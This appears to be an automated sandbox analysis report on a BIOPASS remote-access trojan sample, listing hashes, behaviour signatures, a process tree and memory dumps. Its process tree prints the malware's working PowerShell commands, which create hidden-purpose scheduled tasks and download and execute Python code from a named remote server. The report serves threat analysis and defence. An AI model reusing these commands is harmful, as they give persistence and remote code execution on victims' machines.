Overview

overview

10

Static

static

10

7f4e02a041...c0.exe

windows7_x64

10

7f4e02a041...c0.exe

windows10_x64

10

Analysis

  • max time kernel
    138s
  • max time network
    60s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    12-07-2021 07:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe

  • Size

    4.8MB

  • MD5

    0bbe5966c5ea998605215df6ef88ad90

  • SHA1

    bce97a45e856b71dc8d48ae12b04f69eb6d191d1

  • SHA256

    7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0

  • SHA512

    14b74fc9dcd6249bd9c4e4d0a41137898864f7d936d1a4964e212c1f13e60f846107d176d32aba65dac649cc8899d6842744e2909e813f7ab32ece8023a2a3dd

Score
10/10
biopassrattrojan

Malware Config

Signatures

  • biopass

    BIOPASS is a RAT connected with Winnti group (APT41).

    rattrojanbiopass
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 64 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe
    "C:\Users\Admin\AppData\Local\Temp\7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1652
    • C:\Windows\system32\ping.exe
      ping www.baidu.com
      2⤵
      • Runs ping.exe
      PID:2044
    • C:\Windows\system32\cmd.exe
      cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_SETTINGS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1312
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_SETTINGS',$taskdefinition,6,$null,$null,0,$null);
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1108
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN SYSTEM_SETTINGS
        3⤵
          PID:428
      • C:\Windows\system32\cmd.exe
        cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:920
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\Silverlight.exe';$action.Arguments = '';$rootFolder.RegisterTaskDefinition('SYSTEM_TEST',$taskdefinition,6,$null,$null,0,$null);
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1372
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Run /TN SYSTEM_TEST
          3⤵
            PID:1864
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /DELETE /F /TN SYSTEM_TEST
            3⤵
              PID:392
          • C:\Windows\system32\cmd.exe
            cmd /c "powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);&& SCHTASKS /Run /TN SYSTEM_CDAEMON"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1308
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -Command $taskObject = New-Object -ComObject schedule.service; $taskObject.Connect(); $rootFolder = $taskObject.GetFolder(''); $taskdefinition = $taskObject.NewTask($null); $regInfo = $taskdefinition.RegistrationInfo; $settings = $taskdefinition.Settings; $settings.StartWhenAvailable = $true; $taskdefinition.Principal.RunLevel = 1;$settings.Hidden = $false; $settings.StopIfGoingOnBatteries = $false; $settings.DisallowStartIfOnBatteries = $false; $triggers = $taskdefinition.Triggers; $trigger = $triggers.Create(9); $action = $taskdefinition.Actions.Create(0); $action.Path ='C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe';$action.Arguments = '-c \"exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\''http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\'')).read().decode())'')\" a a';$rootFolder.RegisterTaskDefinition('SYSTEM_CDAEMON',$taskdefinition,6,$null,$null,0,$null);
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:612
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Run /TN SYSTEM_CDAEMON
              3⤵
                PID:1280
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {BFB05B41-B0FE-41D0-8711-279B3F56602D} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
            1⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1616
            • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
              C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/c1222.txt\')).read().decode())')" a a
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1536
            • C:\Users\Public\Silverlight.exe
              C:\Users\Public\Silverlight.exe
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:568
              • \??\c:\eb4298f7fa175f1b7608d4b9\install.exe
                c:\eb4298f7fa175f1b7608d4b9\install.exe
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: GetForegroundWindowSpam
                PID:1060
            • C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe
              C:\Users\Public\ServiceHub\ServiceHub.Host.CLR.exe -c "exec('import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\'http://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/cdaemon.txt\')).read().decode())')" a a
              2⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1960

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/568-151-0x0000000075411000-0x0000000075413000-memory.dmp

            Filesize

            8KB

            Download

          • memory/612-156-0x0000000002524000-0x0000000002526000-memory.dmp

            Filesize

            8KB

            Download

          • memory/612-154-0x000000001ABD0000-0x000000001ABD1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/612-153-0x0000000002420000-0x0000000002421000-memory.dmp

            Filesize

            4KB

            Download

          • memory/612-155-0x0000000002520000-0x0000000002522000-memory.dmp

            Filesize

            8KB

            Download

          • memory/612-159-0x000000001C370000-0x000000001C371000-memory.dmp

            Filesize

            4KB

            Download

          • memory/612-157-0x00000000024F0000-0x00000000024F1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/612-158-0x0000000002380000-0x0000000002381000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1060-164-0x0000000000100000-0x000000000013B000-memory.dmp

            Filesize

            236KB

            Download

          • memory/1108-67-0x000000001A880000-0x000000001A881000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1108-66-0x000000001AB24000-0x000000001AB26000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1108-63-0x0000000002260000-0x0000000002261000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1108-62-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1108-69-0x000000001B830000-0x000000001B831000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1108-68-0x00000000026E0000-0x00000000026E1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1108-64-0x000000001ABA0000-0x000000001ABA1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1108-65-0x000000001AB20000-0x000000001AB22000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1372-145-0x000000001B6B0000-0x000000001B6B1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1372-126-0x00000000023B0000-0x00000000023B1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1372-124-0x000000001ACE4000-0x000000001ACE6000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1372-123-0x000000001ACE0000-0x000000001ACE2000-memory.dmp

            Filesize

            8KB

            Download

          • memory/1372-144-0x0000000002580000-0x0000000002581000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1372-83-0x0000000001F90000-0x0000000001F91000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1372-84-0x000000001AD60000-0x000000001AD61000-memory.dmp

            Filesize

            4KB

            Download